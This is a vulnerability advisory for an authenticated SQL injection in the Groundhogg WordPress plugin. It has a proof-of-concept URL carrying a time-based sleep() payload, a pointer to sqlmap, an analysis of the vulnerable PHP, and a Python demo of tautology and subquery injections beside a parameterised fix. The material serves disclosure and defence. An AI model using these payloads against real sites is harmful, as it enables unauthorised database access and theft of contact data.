
WordPress Groundhogg <= 1.3.11.13 Authenticated SQL Injection

source link: https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-sql-injection-vulnerability/


Oct 23, 2019 • my_exploits, offensive_security



The WordPress Groundhogg plugin, version 1.3.11.13 and earlier, is affected by an authenticated SQL injection vulnerability: the contact export bulk job passes the raw request parameters into a database query.

Initial submission of the vulnerability

# Exploit Title: WordPress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
The WordPress Groundhogg plugin, version 1.3.11.13 and earlier, is affected by an authenticated SQL injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using a WordPress account that holds the export_contacts capability (the only check the export handler performs, see the analysis below), access <your target>/wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response is returned only after 20 seconds, proving that the injected sleep() executed inside the database query (time-based blind SQL injection).
- sqlmap can be used to further exploit the vulnerability once the session cookie of that account is supplied.

Detailed analysis of the vulnerability

The query() method in /wp-content/plugins/groundhogg/includes/admin/tools/class-wpgh-export-bulk-job.php (lines 38-51) accepts arbitrary user-supplied data: after a capability check it hands the entire $_GET array to the contact query, as follows:

public function query($items)
{
    // The only gate: the caller must hold the export_contacts capability.
    if ( ! current_user_can( 'export_contacts' ) ){
        return $items;
    }

    $query = new WPGH_Contact_Query();
    // The whole request is forwarded: no key allow-list, no type checks.
    $args = $_GET;

    $contacts = $query->query( $args );
    $ids = wp_list_pluck( $contacts, 'ID' );

    return $ids;
}

The line $contacts = $query->query( $args ); delivers that unsanitised input to the following method in /wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php (lines 279-284), which merges the request parameters into the query variables without validating any of them:

public function query( $query ) {
    // wp_parse_args() only merges arrays; it performs no escaping or validation.
    $this->query_vars = wp_parse_args( $query );
    $items = $this->get_items();

    return $items;
}

Finally, the SQL assembled from those unsanitised query variables is executed in wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php at line 430 ( WPGH_Contact_Query->query_items() ):

// $this->request already contains the attacker-controlled values; it is run as-is.
$results       = $wpdb->get_results( $this->request );

return $results;

How to fix

Update the Groundhogg plugin to the latest available version. Until the update is applied, keep the export_contacts capability limited to trusted roles, since it is the only gate in front of the vulnerable handler.
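The advisory does not show how get_items() turns the optin_status values into SQL, so the following is an added model, not Groundhogg code, of the pattern the PoC implies: request values spliced straight into an IN (...) list, beside a hardened version that casts each value to an integer and binds it through placeholders (the $wpdb->prepare() equivalent). The contacts table and its rows are constructed sample data, and sqlite3 stands in for $wpdb; the payloads are chosen to work in SQLite, which has no sleep().

```python
"""Added model of the vulnerable pattern and its fix; not Groundhogg's code.
sqlite3 stands in for $wpdb and the table data is constructed for the example."""
import sqlite3
from typing import Iterable, List


def _open_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the plugin's contacts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE contacts (ID INTEGER PRIMARY KEY, email TEXT, optin_status INTEGER)"
    )
    conn.executemany(
        "INSERT INTO contacts VALUES (?, ?, ?)",
        [(1, "a@example.com", 1), (2, "b@example.com", 2),
         (3, "c@example.com", 3), (4, "d@example.com", 0)],
    )
    return conn


def export_ids_unsafe(optin_status: Iterable[str]) -> List[int]:
    """Assumed model of the vulnerable flow: the optin_status[] values from
    $_GET are joined straight into the SQL text, so whatever the caller sends
    becomes part of the query grammar (the PoC's sleep() subquery, a tautology,
    a nested SELECT, ...)."""
    sql = "SELECT ID FROM contacts WHERE optin_status IN (%s)" % ", ".join(optin_status)
    conn = _open_db()
    try:
        return sorted(row[0] for row in conn.execute(sql))
    finally:
        conn.close()


def export_ids_safe(optin_status: Iterable[str]) -> List[int]:
    """Hardened version: every value must be a non-negative integer, and the
    integers are bound through placeholders, so request data can only change
    the compared values, never the shape of the statement."""
    values = []
    for raw in optin_status:
        if not raw.isdigit():
            raise ValueError(f"invalid optin_status value: {raw!r}")
        values.append(int(raw))
    if not values:
        return []  # nothing to filter on; do not emit an empty IN () list
    placeholders = ", ".join("?" for _ in values)
    sql = f"SELECT ID FROM contacts WHERE optin_status IN ({placeholders})"
    conn = _open_db()
    try:
        return sorted(row[0] for row in conn.execute(sql, values))
    finally:
        conn.close()


if __name__ == "__main__":
    legitimate = ["1", "0"]
    tautology = ["0) OR 1=1 --", "0"]            # turns the filter into "match everything"
    subquery = ["(SELECT max(ID) FROM contacts)", "0"]  # attacker-chosen SELECT runs
    print("unsafe, legitimate:", export_ids_unsafe(legitimate))
    print("unsafe, tautology: ", export_ids_unsafe(tautology))
    print("unsafe, subquery:  ", export_ids_unsafe(subquery))
    print("safe, legitimate:  ", export_ids_safe(legitimate))
    try:
        export_ids_safe(tautology)
    except ValueError as exc:
        print("safe, tautology:    rejected:", exc)
```

The hardened function rejects rather than silently coerces, which is the right behaviour for an admin-only export: a malformed optin_status is a bug or an attack, not a value to guess at. In WordPress code the same shape is array_map('absint', ...) on the values followed by $wpdb->prepare() with one %d placeholder per value.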
